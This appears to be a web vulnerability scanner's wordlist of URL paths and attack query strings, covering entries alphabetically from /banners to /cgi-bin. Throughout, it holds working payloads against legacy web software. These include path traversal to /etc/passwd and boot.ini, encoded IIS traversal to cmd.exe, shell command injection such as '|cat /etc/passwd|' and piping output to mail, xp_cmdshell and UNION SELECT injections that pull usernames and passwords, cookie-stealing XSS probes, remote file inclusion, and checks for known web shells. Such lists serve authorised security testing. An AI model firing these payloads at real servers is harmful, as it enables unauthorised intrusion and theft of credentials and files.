/banners.cgi?aff=&cat=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/banners.php
/banners.php?op=Change
/banners/
/banner_add_edit.asp?pagetype=2&bannerid=%27
/bar/
/base
/base/
/base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/passwd&id=1
/bash
/basic/
/basilix.php3
/basilix.php3?
/basilix.php3?request_id[DUMMY]=../../../../etc/passwd&RequestID=DUMMY&username=blah&password=blah
/basilix.php3?request_id[DUMMY]=../../../../etc/passwd&RequestID=DUMMY&username=sec&password=secu
/basilix/basilix.php
/basilix/basilix.php3
/basilix/basilix.php3?username=blah;ls
/basilix/basilix.php?username=blah;ls
/basket.php?cat=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/batch/
/batch_add.asp
/batch_manage.asp
/bb-ack.sh
/bb-dnbd
/bb-dnbd/
/bb-dnbd/bb-hist.sh
/bb-dnbd/faxsurvey
/bb-hist
/bb-hist.sh
/bb-hist.sh?HISTFILE=../../../../../../../../../../etc/passwd
/bb-histlog.sh
/bb-hostsvc.sh
/bb-hostsvc.sh?HOSTSVC=../../../../../../../../../../etc/passwd
/bb-hostsvc.sh?HOSTSVC=/../../../../../../../../etc/passwd
/bb-login.php?re=%22%3E%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/bb-rep.sh
/bb-replog.sh
/bb.sqljsp//..//..//..//..//..//../winnt/win.ini
/bb/index.php?limit='
/bb000001.pl
/bbs.pl%3F+.htr
/bbs/
/bbs/admin/
/bbs/admin/config/
/bbs/data/
/bbs/db/
/bbs/include/
/bbs/lb5000/search.cgi
/bbs_forum.cgi
/bbv/
/bb_admin.php?action=searchusers2&whatus=%22+%2F%3E%3Cscript%3Ealert%2810488%29%3C%2Fscript%3E&searchus=id
/bb_smilies.php
/bb_smilies.php3
/bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
/bc4j.html
/bdata/
/bdatos/
/bdir.htr
/bea/
/beta
/beta/
/bigconf.cgi
/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=
/bigsam_guestbook.php
/bigsam_guestbook.php?displayBegin=9999...9999
/bill/
/billing.nsf
/billing/
/billpay/
/bin
/bin-sdb
/bin/
/bin/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
/bin/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
/bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/bin/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
/bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir
/bin/..%c0%ae%c0%ae/%c0%ae%c0%ae/winnt/system32/cmd.exe?/c+dir
/bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
/bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
/bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir
/bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir
/bin/..%e0%80%af../winnt/system32/cmd.exe?/c+dir
/bin/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir
/bin/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir
/bin/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir
/bin/.cobalt/siteUserMod/siteUserMod.cgi
/bin/ad.cgi
/bin/adcycle
/bin/admin.pl
/bin/admin/admin
/bin/aglimpse
/bin/allmanage.pl
/bin/allmanageup.pl
/bin/amlite/amadmin.pl
/bin/anacondaclip.pl?template=check
/bin/AnyForm2
/bin/AT-admin.cgi
/bin/AT-generate.cgi
/bin/auktion.pl
/bin/awl/auctionweaver.pl
/bin/bb-hist.sh
/bin/bbs_forum.cgi
/bin/bizdb1-search.cgi
/bin/bnbform.cgi
/bin/Board/db/
/bin/build.cgi
/bin/cached_feed.cgi
/bin/cachemgr.cgi
/bin/calender.pl
/bin/calender_admin.pl
/bin/cal_make.pl
/bin/campas
/bin/cardboard.cgi
/bin/cfgwiz.exe
/bin/cgiforum.pl
/bin/CGImail.exe
/bin/cgiwrap
/bin/changepw.cgi
/bin/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir
/bin/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir
/bin/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir
/bin/check.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir
/bin/classifieds.cgi
/bin/commerce.cgi?page=check
/bin/common/calendar.pl?course_name=<script>alert(document.cookie)</script>
/bin/common/user_update_admin.pl
/bin/common/user_update_passwd.pl
/bin/configure
/bin/contents.htm
/bin/Count.cgi
/bin/counterfiglet/nc/f
/bin/CrazyWWWBoard.cgi
/bin/cvsweb/cvsweb.cgi
/bin/day5datacopier.cgi
/bin/day5datanotifier.cgi
/bin/db2www/library/document.d2w/show
/bin/dcadmin.cgi
/bin/dcboard.cgi
/bin/dcforumlib.pl
/bin/dmailweb.cgi
/bin/dnewsweb.cgi
/bin/dumpenv.pl
/bin/edit.pl
/bin/empower?DB=UkRteamHole
/bin/environ.cgi
/bin/everythingform.cgi
/bin/ezshopper2/loadpage.cgi
/bin/ezshopper3/loadpage.cgi
/bin/faxsurvey
/bin/filemail.pl
/bin/files.pl
/bin/finger
/bin/formmail.cgi
/bin/fpadmin.htm
/bin/fpremadm.exe
/bin/fpsrvadm.exe
/bin/gbook/gbook.cgi?_MAILTO=check;id
/bin/getdoc.cgi
/bin/glimpse
/bin/global.cgi
/bin/guestbook.cgi
/bin/guestbook.pl
/bin/handler
/bin/hsx.cgi
/bin/htgrep
/bin/htmlscript
/bin/htsearch
/bin/htsearch?config=aaa
/bin/ikonboard/help.cgi
/bin/info2www
/bin/infosrch.cgi
/bin/ipf/etc/gfw/ui/pwd.dat
/bin/jj
/bin/lasso.cgi
/bin/loadpage.cgi
/bin/mailfile.cgi
/bin/mailform.pl
/bin/maillist.pl
/bin/mailnews.cgi
/bin/mailto.cgi
/bin/man.sh
/bin/mdma.bat
/bin/mmstdod.cgi?ALTERNATE_TEMPLATES=
/bin/netauth.cgi
/bin/news/news.cgi
/bin/newsdesk.cgi?t=../pass.txt
/bin/nph-maillist.pl
/bin/nph-publish
/bin/nph-test-cgi
/bin/pagelog.cgi
/bin/pals-cgi
/bin/perl
/bin/perl.exe
/bin/perlshop.cgi
/bin/pfdisplay.cgi
/bin/phf
/bin/phf.cgi
/bin/php
/bin/php.cgi
/bin/plusmail
/bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=/bin/ls%00
/bin/post-query
/bin/postings.cgi?action=reply&forum=&number=1&topic=000001.cgi&TopicSubject=&replyto=0
/bin/processit.pl
/bin/query
/bin/redirect.cgi
/bin/register.cgi
/bin/replicator/webpage.cgi
/bin/responder.cgi
/bin/rpm_query
/bin/rwwwshell.pl
/bin/s.cgi?q=a&tmpl=check
/bin/scripts/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir
/bin/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
/bin/scripts/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
/bin/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
/bin/scripts/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
/bin/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
/bin/scripts/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir
/bin/scripts/..%c1%9f../winnt/system32/cmd.exe?/c+dir
/bin/scripts/whois.cgi?action=load&whois=check
/bin/search.cgi?letter=
/bin/Search.pl
/bin/search/tidfinder.cgi?2956734
/bin/simplestguest.cgi
/bin/simplestmail.cgi
/bin/ssi
/bin/store.cgi?StartID=../etc/hosts%00.html
/bin/subscribe.pl
/bin/survey.cgi
/bin/test-cgi
/bin/textcounter.pl
/bin/ultraboard.cgi
/bin/unlg1.1
/bin/unlg1.2
/bin/upload_file.pl
/bin/ustorekeeper.pl
/bin/view-source
/bin/viewfile/TWiki/TWikiDocGraphics?rev=1;filename=../../../../../etc/passwd
/bin/view_page.html
/bin/w3-msql
/bin/wais.pl
/bin/webdata.cgi
/bin/webdist.cgi
/bin/webdriver
/bin/webgais
/bin/webplus.cgi?Script=/webplus/webping/webping.wml
/bin/websendmail
/bin/webspirs.cgi
/bin/webwho.pl
/bin/whois_raw.cgi
/bin/wrap
/bin/wrap.cgi
/bin/www-sql
/bin/wwwboard.pl
/bin/Xrun.cgi
/bin/YaBB.pl
/binaries/
/binary/
/bio/
/bios/
/bizarre/
/bizdb1-search.cgi
/bizdb1-search.cgi?template=bizdb-summary&dbname=;ls|mail%20test@@test.com|&f6=^a.*&action=searchdbdisplay
/BizTalkServerDocs/
/BizTalkServerRepository/
/biztalktracking/rawdocdata.asp
/biztalktracking/rawdocdata.asp?nDocumentKey=1,@tnDirection=1;execmaster.dbo.xp_cmdshell%20'dir'--
/bkup
/bkup/
/bla.jsp?\..\..\..\..\..\..\..\..\..\..\boot.ini
/black/
/blah-whatever-badfile.jsp
/blah-whatever.jsp
/blah/classifieds/admin.cgi
/blah123.php
/blahb.ida
/blahb.idq
/blah_badfile.shtml
/blat.exe
/block-forums.php?graph=<script>alert('CSS')</script>
/blockquote/
/blog
/Blog.mdb
/blog/
/blog/archives.php?id='
/blog/include/common/comfinish.cfm?FTRESULT.errorcode=0&FTVAR_SCRIPTRUN=alert%28xss%29
/blog/index.php?tag=x%2527
/blog/journal.php?id='
/blog/journal.php?id=80%20union%20show%20tables
/blogadmin.php?blogid=%27
/blogger/data/pref.db
/blogger/data/subscribers.db
/blogs/
/blogs/index.php?title='
/bmc/admin.php
/bmc/admin.php/%3cscript%3ealert(xss)%3c%2fscript%3e
/bnbform.cgi
/bnbform.pl
/bnbsurvey.cgi
/bo/
/boadmin/
/BOADMIN/BACKOFFICE/SERVICES.ASP
/board.cgi
/board.html
/board.php
/board.php?FID=<script>alert(document.cookie)</script>
/board/newreply.php
/board/search.cgi
/board/YaBB.pl?board=news&action=display&num=../../../../../../../../../../etc/passwd%00
/boarddir/postings.cgi
/boardroom/
/boards/YaBB.pl?board=news&action=display&num=../../../../../../../../../../etc/passwd%00
/bob/
/body/
/bogus.cdx
/bogus.cer
/bogus.shtm
/bogus.shtml
/bogusxml.xml
/bogusxsl.xsl
/boilerplate.asp
/boilerplate.asp?NFuse_Template=.../.../.../.../.../.../.../.../.../boot.ini&NFuse_CurrentFolder=/
/boilerplate.asp?NFuse_Template=../../boot.ini&NFuse_CurrentFolder=/SSLx0020Directories
/boilerplate.asp?NFuse_Template=template.ica&NFuse_Application=Attorneyx0020Homex0020Directory&NFuse_MIMEExtension=.ica
/bonsai/cvslog.cgi
/bonsai/cvslog.cgi?file=/index.html&rev=<script>alert('vulnerable')</script>&root=/cvsroot/
/bonsai/cvsview2.cgi
/bonsai/multidiff.cgi
/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
/book/
/bookmark.nsf
/bookmark.nsf?OpenDatabase
/bookmarks
/bookmarks/add_bookmark.php
/bookmarks/apb_common.php
/bookmarks/apb_view_class.php
/bookmarks/templates/head.php
/books.nsf
/books.nsf/?OpenDatabase
/books/
/BookStore_MSAccess.mdb
/boot
/boot/
/boozt/admin/index.cgi?section=5&input=1
/bottom.html
/bp/database/dbBlogMX.mdb
/breakcal/calendar.cgi
/bridges/SMF/logout.php?path_to_smf=../../images/yim.gif%00
/broken/
/browse.php?browse_cat_id=1&browse_cat_name=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/browse.php?cell_title_background_color=%22%3E%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/browse0.htm?ProductIndex=%27
/browse0.htm?ProductIndex=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/browseaccounts.php
/browser/
/browser/details.php?class=%3Cscript%3Ealert%2810374%29%3C%2Fscript%3E
/bsguest.cgi
/bsguest.cgi?email=x;ls
/bslist.cgi
/bslist.cgi?email=x;ls
/btauxdir/
/btdownload.php?type=torrent&file=../../../../../../etc/passwd
/buddies.blt
/buddy.blt
/buddylist.blt
/budget/
/bug
/bug.php?op=add&project=0'
/bug.php?op=viewvotes&bugid='
/bug.php?op=vote&bugid='
/bug/
/BugList.CGI
/bugs
/bugs.php?op='
/bugs/
/bugzilla/
/bugzilla/BugList.CGI
/bugzilla/DoEditVotes.CGI
/bugzilla/Process_Bug.CGI
/bugzilla/showdependencygraph.cgi
/bugzilla/showdependencytree.cgi
/bugzilla/showvotes.cgi
/bugzilla/Show_Bug.CGI
/bug_sponsorship_list_view_inc.php?t_core_path=../../../../../../../../etc/passwd%00
/build.cgi
/bulk/bulk.cgi
/busytime.nsf
/busytime.nsf/?OpenDatabase
/buy
/buy.storefront/3baecb4a00025ad227a4c30e95010642/winnt/cmd.exe?/c+dir+c:
/buy/
/buynow/
/by
/c
/c-h.v2.php
/c/
/c/httpodbc.dll
/c/inetpub/scripts/root.exe?/c+dir
/c/portal/login
/c/portal/login?login=%22%3E%3Cscript%3Ealert%2810098%29%3C%2Fscript%3E%3Ca+b%3D%22c
/c/s.dll/ncbook/book.cgi?action=default&current=|ls|&form_tid=996604045&prev=main.html&list_message_index=10
/c/winnt/system32/cmd.exe?/c+dir
/c/winnt/system32/cmd.exe?/c+dir+/OG
/c32web.exe
/c32web.exe/ChangeAdminPassword
/c32web.exe/CheckError?error=53
/c32web.exe/ShowAdminDir
/c99.php
/c99shell.php
/C:/
/c://
/C:/temp/\../
/ca/..\\..\\..\\..\\..\\..\\..\\..\\/\\etc/\\passwd
/ca/..\\..\\..\\..\\..\\..\\..\\..\\winnt/\\win.ini
/ca/..\\..\\..\\..\\..\\..\\/\\etc/\\passwd
/ca//\\../\\../\\../\\../\\../\\../\\../\\..\\windows/\\win.ini
/ca//\\../\\../\\../\\../\\../\\../\\windows/\\win.ini
/ca/\../\../\../\../\../\../\../\../\../\../\boot.ini
/ca000001.pl?ACTION=SHOWCART&hop=\
/ca000007.pl?ACTION=SHOWCART&REFPAGE=\
/cache
/cache-stats
/cache-stats/
/cache/
/cached_feed.cgi?../../../.+/etc/passwd
/cachemgr.cgi
/caja/
/calendar.asp?action=viewevent&eventid=-1%27
/calendar.nsf
/calendar.nsf?OpenDatabase
/calendar.php?action=dayview&year=2006&month=2&day=1&&GLOBALS%5B%5D=1&bdaylist=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/calendar.php?action=dayview&year=2006&month=2&day=1&&GLOBALS%5B%5D=1&events=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/calendar.php?action=dayview&year=2007&month=3&day=1111111%27
/calendar.php?action=editevent&eid=1&GLOBALS%5B%5D=1&yearopts=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/calendar.php?Cat=&month='&year=2005
/calendar.php?month%5B%5D=1
/calendar.php?month=%22%3E%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/calendar.php?month=%27
/calendar.php?month=&year=%27
/calendar.php?month=10%27&day=10%27&year=2005%27&subject=test&description=test&action=do_addevent
/calendar.php?op=cal&month=%22%3E%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E&year=2006
/calendar.php?op=cal&month=3&year=%22%3E%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/calendar.php?op=cal&month=5&year=2'%3Ch1%3DarkBicho005&catview=1
/calendar.php?op=cal&month=6&year=%3C/a%3E%3Cscript%3Ealert(xss)%3C/script%3E%3Ca%3E&catview=0
/calendar.php?op=day&ask=nd&da=28&mo=3&ye=2006&next=%22%3E%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/calendar.php?op=day&ask=nd&da=28&mo=3&ye=2006&next=2&prev=%22%3E%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/calendar.php?week=%22%3E%3Cscript%3Ealert(xss)%3C/script%3E
/calendar.php?year=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/calendar.php?year=10000
/calendar/
/calendar/calendar_admin.pl?config=|cat%20/etc/passwd|
/Calendar/details.asp?Event_ID='
/calendar/inc/class.holidaycalc.inc.php?GLOBALS[phpgw_info][user][preferences][common][country]=/../../../../../../../../boot.ini%00
/calendar/inc/class.holidaycalc.inc.php?GLOBALS[phpgw_info][user][preferences][common][country]=/../../../../../../../../winnt/win.ini%00
/calendar/myagenda.php?%22%3E%3Cscript%3Ealert%2810686%29%3C%2Fscript%3E
/calendar_admin
/calendar_admin.cgi
/calendar_admin.pl
/calendar_admin.pl?config=|cat%20/etc/passwd|
/calender_admin.pl
/cal_day.php?op=day&date=2005-05-03&catview=1'
/cal_day.php?op=day&date=2006-01-10&catview=99%27
/cal_event.php?id=%27
/cal_footer.inc.php?leftfooter=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/cal_functions.inc.php
/cal_login.php?op=login
/cal_make.pl?p0=../../../../../../../../../../../../etc/hosts%00
/cal_make.pl?p0=../../../../../../../../../../etc/passwd%00
/cal_make.pl?p0=<script>alert(xss)</script>
/cal_popup.php?id=%27
/cal_week.php?op=week&catview%5B%5D=1
/cal_week.php?op=week&catview=
/campas
/campas?%0acat%0a/etc/passwd%0a
/campas?%0als%20-lFa%20/etc
/captcha.php?imagehash%5B%5D=123
/carbo.dll
/carbo.dll?icatcommand=..\..\..\..\boot.ini&catalogname=catalog
/carbo.dll?icatcommand=..\..\boot.ini&catalogname=catalog
/carbo.dll?icatcommand=..\..\winnt\win.ini&catalogname=catalog
/card/
/cardboard.cgi
/cards/
/Carello/add.exe
/Carello/add.exe?c:oot.ini
/Carello/Carello.dll
/Carello/Carello.dll?CARELLOCODE=SITE2&VBEXE=C:\..\winnt\system32\cmd.exe%20/c%20echo%20test>c:\defcom.txt
/Carello/Carello.dll?VBEXE=c:\.\winnt\system32\cmd.exe%20/c%20dir>c:\dir.txt
/carellocfdocs
/carellocfdocs/
/carellofdocs/
/cart.php?message1=%27%3E%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/cart.php?message=%27%3E%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/cart.php?target=category&category_id='
/cart.php?target=product&product_id='&category_id=246
/cart.pl
/cart.pl?db='
/cart.pl?db|cart.pl|All%20Items
/cart.pl?env
/cart/
/cart/cart.cgi
/cart/settings.ini
/cart/vars.dat
/cart32.exe
/cart32.exe/cart32clientlist
/cart32.exe/cart32clientlist?passwd=wemilo
/cart32.exe/expdate
/cart32/tempfiles.list
/cartcart.cgi
/cartmanager.cgi
/cartWiz/store/addToCart.asp?idProduct='&quantity=1
/cartwiz/store/productDetails.asp?idProduct='
/cartwiz/store/searchResults.asp?name=&idCategory=&sku=&priceFrom='&priceTo=9999999999&validate=1
/cartwiz/store/searchResults.asp?name=&idCategory=&sku=&priceFrom=0&priceTo='&validate=1
/cartwiz/store/searchResults.asp?name=&idCategory='&sku=&priceFrom=0&priceTo=9999999999&validate=1
/cash/
/casp401k/
/casp401k/default.htm
/caspagent/
/caspagent/default.asp
/caspclient/
/caspclient/default.asp
/caspdoc/
/casProcess.inc.php?claro_CasLibPath=/../../../../../../../../boot.ini%00
/casProcess.inc.php?claro_CasLibPath=/../../../../../../../../etc/passwd%00
/casProcess.inc.php?claro_CasLibPath=/../../../../../../../../winnt/win.ini%00
/caspsamp
/caspsamp/
/caspsamp/ado.asp
/caspsamp/calendar.asp
/caspsamp/codebrws.asp
/caspsamp/codebrws.asp?source=/caspsamp/../admin/conf/service.pwd
/caspsamp/codebrws.asp?source=/caspsamp/../admin/logs/server
/caspsamp/codebrws.asp?source=/caspsamp/../global_odbc.ini
/caspsamp/codebrws.asp?source=/caspsamp/../LICENSE.LIC
/caspsamp/codebrws.asp?source=/caspsamp/../logs/server-3000
/caspsamp/diagnostics/compverify.asp
/caspsamp/dosperros/index.asp
/caspsamp/hello.asp
/caspsamp/inventorysample.asp
/caspsamp/java.asp
/caspsamp/jsado.asp
/caspsamp/loancalc/loancalc.asp
/caspsamp/loancalc/login.htm
/caspsamp/server.asp
/caspsamp/spicepack_samples/
/caspsamp/sqlexecute.asp
/cat
/cat.asp?iCat=%27&iChannel=1&nChannel=News
/cat.asp?iCat=%27&iChannel=2&nChannel=Articles
/cat.asp?iCat=%27&iChannel=3&nChannel=Pictures+
/cat/
/catalog
/catalog.nsf
/catalog.nsf/?Open
/catalog.nsf/?OpenDatabase
/Catalog.wci/
/catalog/
/catalog/admin/banner_manager.php?page=1%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/catalog/admin/countries.php?page=1%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/catalog/admin/languages.php?page=1%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/catalog/admin/manufacturers.php?page=1%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/catalog/admin/newsletters.php?page=1%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/catalog/admin/products_expected.php?page=1%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/catalog/admin/tax_classes.php?page=1%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/catalog/admin/zones.php?page=1%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/catalog/includes/include_once.php
/catalog/includes/include_once.php?include_file=XXnonexistentXX
/catalog/includes/include_once.php?inc_prefix=http://MYBOX/
/catalog/inludes/include_once.php
/catalog/inludes/include_once.php?inc_prefix=http://MYBOX/
/catalogs/
/catalogue.php?exp=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/catalog_products_with_images.php/%22%3E%3Cscript%3Ealert(xss)%3C/script%3E%3C%22
/catalyst/exec/show/config/cr
/categorie.php3?cid=blahblah
/categorie.php3?cid=june
/categories.php3?cid=blahblah
/categories.php?new_language=elvish&mode=select
/category.cfm?cat=%27
/category.php?cat=%22%3E%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E&num=0
/category.php?cat=1&num=%22%3E%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/category.php?cat=1&search=%22%3E%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/category.php?cat=cat=-1/**/UNION/**/ALL/**/SELECT/**/1,CONCAT(0x3b,0x3a,username,0x3a,0x3a,password,0x3a,0x3b),3,4,5/**/FROM/**/users/*
/category.php?cat=search&search=%27
/category.php?cname=%27
/category.php?id='403547101385
/category.php?id_category=%27
/category.php?id_category=-1/**/UNION/**/SELECT/**/123456,123456,2,3/*
/category/
/categorydetail.php?Cat=1%27
/category_list.php?category_ID=-1/**/UNION/**/SELECT/**/teststring/*
/catinfo
/catinfo/
/cavecreekleavemypasswordfilealone/
/ca_html/
/ca_icons/
/ca_widgets/
/cbi-bin/
/cbmc/forums.cgi
/cbms/cbmsfoot.php
/cbms/changepass.php
/cbms/editclient.php
/cbms/editclient.php3
/cbms/passgen.php
/cbms/realinv.php
/cbms/usersetup.php
/cc
/cc-bill/
/cc/
/cc3/cart.php?act=reg&redir==%3D%22%3E%3cscript%3Ealert%28xss%29%3C%2Fscript%3E
/cc3/index.php?act=viewCat&catId=1%22><script>alert(xss)</script>
/cc3/index.php?act=viewCat&catId=saleItems%22><script>alert(xss)</script>
/cc3/index.php?act=viewDoc&docId=3%22><script>alert(xss)</script>
/cc3/index.php?act=viewProd%22><script>alert(xss)</script>
/cc3/index.php?act=viewProd&productId=1%22><script>alert(xss)</script>
/cc3/index.php?searchStr=%22%3E%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E&act=viewCat
/ccard
/ccard/
/ccards/
/ccbill
/ccbill/
/ccbill/secure/ccbill.log
/ccbill/whereami.cgi?g=cat%20../../../../etc/passwd
/ccbill/whereami.cgi?g=ls
/ccs/
/cd-cgi/
/cd-cgi/sscd_suncourier.pl
/cd-cgi/sscd_suncourier.pl?emailaddr="foo@bar.com|id|"&step=submit
/cd/
/cdomain.pl
/cdrom
/cdrom/
/ceilidh.exe/ceilidh/?N4
/censura.php?cmd=vendor_info&vendorid=-1%27
/censura.php?cmd=vendor_info&vendorid=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8,9,10,12,13,14,15,16/**/from/**/users/**/
/cersvr.nsf
/cert
/cert/
/certa.nsf
/CertControl/
/CertEnroll/
/certif/
/certificado/
/certificate
/certificate/
/certificates
/certificates/
/certified/
/certify/
/certlog.nsf
/certlog.nsf/?OpenDatabase
/certs/
/certsrv.nsf
/certsrv.nsf/?OpenDatabase
/CertSrv/
/certsrv/..%255cwinnt/system32/cmd.exe?/c+dir
/certsrv/..%c0%af../winnt/system32/cmd.exe?/c+dir
/certsvr.nsf
/ce_html/
/cfanywhere/index.html
/cfappman/
/cfappman/index.cfm
/cfbin/board.cgi
/cfcache.map
/cfdocs
/cfdocs/
/cfdocs/cfcache.map
/cfdocs/cfmlsyntaxcheck.cfm
/cfdocs/cfmsyntaxcheck.cfm
/cfdocs/exampleapp/
/cfdocs/exampleapp/docs/sourcewindow.cfm
/cfdocs/exampleapp/docs/sourcewindow.cfm?Template=/etc/passwd
/cfdocs/exampleapp/docs/sourcewindow.cfm?Template=c:\boot.ini
/cfdocs/exampleapp/docs/sourcewindow.cfm?Template=Ct.ini
/cfdocs/exampleapp/email/application.cfm
/cfdocs/exampleapp/email/getfile.cfm
/cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini
/cfdocs/exampleapp/email/getfile.cfm?filename=ct.ini
/cfdocs/exampleapp/email/namefile.cfm
/cfdocs/exampleapp/publish/
/cfdocs/exampleapp/publish/admin/addcontent.cfm
/cfdocs/exampleapp/publish/admin/application.cfm
/CFDOCS/exampleapps
/cfdocs/examples
/cfdocs/examples/
/cfdocs/examples/cvbeans/beaninfo.cfm
/cfdocs/examples/CVLibrary/GetFile.CFM?FT=Text&FST=Plain&FilePath=C:\boot.ini
/cfdocs/examples/httpclient/mainframeset.cfm
/cfdocs/examples/mainframeset.cfm
/cfdocs/examples/parks/detail.cfm
/cfdocs/expelval/displayopenedfile.cfm
/cfdocs/expelval/eval.cfm
/cfdocs/expelval/exprcalc.cfm
/cfdocs/expelval/openfile.cfm
/cfdocs/expelval/parks/detail.cfm
/cfdocs/expelval/sendmail.cfm
/cfdocs/expelvel/openfile.cfm
/cfdocs/expeval
/cfdocs/expeval/displayopenedfile.cfm
/cfdocs/expeval/displayopenedfile.cfm?OpenFilePath=cnt\win.ini
/cfdocs/expeval/eval.cfm
/cfdocs/expeval/ExprCalc.cfm
/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=/etc/passwd
/cfdocs/expeval/exprcalc.cfm?OpenFilePath=c:\boot.ini
/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\windows\win.ini
/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\winnt\win.ini
/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=ct.ini
/cfdocs/expeval/mole.cfm
/cfdocs/expeval/openfile.cfm
/cfdocs/expeval/sendmail.cfm
/cfdocs/expressions.cfm
/cfdocs/MOLE.CFM
/cfdocs/root.cfm
/cfdocs/scripts/cfcache.map
/cfdocs/snippets/
/cfdocs/snippets/evaluate.cfm
/cfdocs/snippets/fileexist.cfm
/cfdocs/snippets/fileexists.cfm
/cfdocs/snippets/gettempdirector.cfm
/cfdocs/snippets/gettempdirectory.cfm
/cfdocs/snippets/setlocale.cfm
/cfdocs/snippets/viewexample.cfm
/cfdocs/snippets/viewexample.cfm?Tagname=
/cfdocs/TOXIC.CFM
/cfdocs/zero.cfm
/cfgwiz.exe
/cfide/
/cfide/administrator/
/cfide/administrator/adminsettings.cfm
/CFIDE/administrator/index.cfm
/CFIDE/administrator/login.cfm
/cfide/Administrator/startstop.html
/cfide/Administrator/startstop.html?.cfm
/CFIDE/componentutils/cfcexplorer.cfc?method=getcfcinhtmtestl&name=CFIDE.adminapi.administrator&path=/cfide/adminapi/administrator.cfctestt%22%3E%3C%00script%3Ealert%28xss%29%3C%2Fscript%3E
/cfide/probe.cfm
/cfusion/cfapps/forums/data/forums.mdb
/cfusion/cfapps/forums/forums_.mdb
/cfusion/cfapps/security/data/realm.mdb
/cfusion/cfapps/security/realm_.mdb
/cfusion/database/cfexamples.mdb
/cfusion/database/cfsnippets.mdb
/cfusion/database/cypress.mdb
/cfusion/database/smpolicy.mdb
/CF_MX_SERVER/
/cg-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd
/cg-bin/14all.cgi?cfg=../../../../../../../../etc/passwd
/cgforum.cgi
/cgi-app/
/cgi-auth
/cgi-auth/
/cgi-auth/userreg.cgi
/cgi-bin
/cgi-bin"><script>alert(097531);</script>
/cgi-bin-
/cgi-bin-old
/cgi-bin-sdb
/cgi-bin-sdb/printenv
/cgi-bin-sdb/sdbsearch.cgi
/cgi-bin.
/cgi-bin.-old
/cgi-bin.0
/cgi-bin.000
/cgi-bin.1
/cgi-bin.2
/cgi-bin.3
/cgi-bin.4
/cgi-bin.5
/cgi-bin.6
/cgi-bin.7
/cgi-bin.8
/cgi-bin.9
/cgi-bin.ARC
/cgi-bin.bac
/cgi-bin.backup
/cgi-bin.bak
/cgi-bin.bckp
/cgi-bin.BKP
/cgi-bin.bkup
/cgi-bin.bz2
/cgi-bin.diff
/cgi-bin.gz
/cgi-bin.inc
/cgi-bin.las
